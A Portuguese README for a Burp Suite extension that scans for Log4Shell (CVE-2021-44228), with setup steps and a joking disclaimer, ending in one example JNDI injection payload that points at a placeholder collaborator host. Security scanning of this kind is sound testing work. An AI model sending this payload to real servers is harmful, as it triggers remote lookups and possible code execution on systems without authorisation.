Extensão do Burp para escanear a vulnerabilidade Log4Shell (CVE-2021-44228) com payloads personalizados.
Aviso
Não me responsabilizo por suas ações, congelamento do Burp Suite, invasão do alvo, guerra termonuclear ou a crise econômica atual causada por você seguir estas instruções. VOCÊ está escolhendo usar esta ferramenta, e se apontar o dedo para mim por estragar alguma coisa, vou dar risada de você.
Instruções:
Instale a extensão a partir dos lançamentos pré-compilados ou compile a partir do código-fonte.
Desative/Desmarque todas as outras extensões de escaneamento ativo, como active scan++, burp bounty pro, param-miner etc.
No menu superior, abra as configurações do Log4J Scanner.
Adicione seu payload personalizado e salve as configurações.
Selecione seu alvo > clique com botão direito > Scan.
Selecione Scan Configuration > Select from library
Selecione apenas Audit checks - extensions only e clique em OK.
Agradecimentos especiais a Silent Signal, as instruções e configurações de escaneamento foram inspiradas em sua extensão.
Instruções importantes para lembrar:
No seu payload personalizado, NÃO adicione a URL do seu colaborador, apenas coloque [collaborator-server] como espaço reservado,
[collaborator-server será substituído pela URL do seu servidor colaborador.
Exemplo de payload: "${jndi:ldap://[collaborator-server]/a}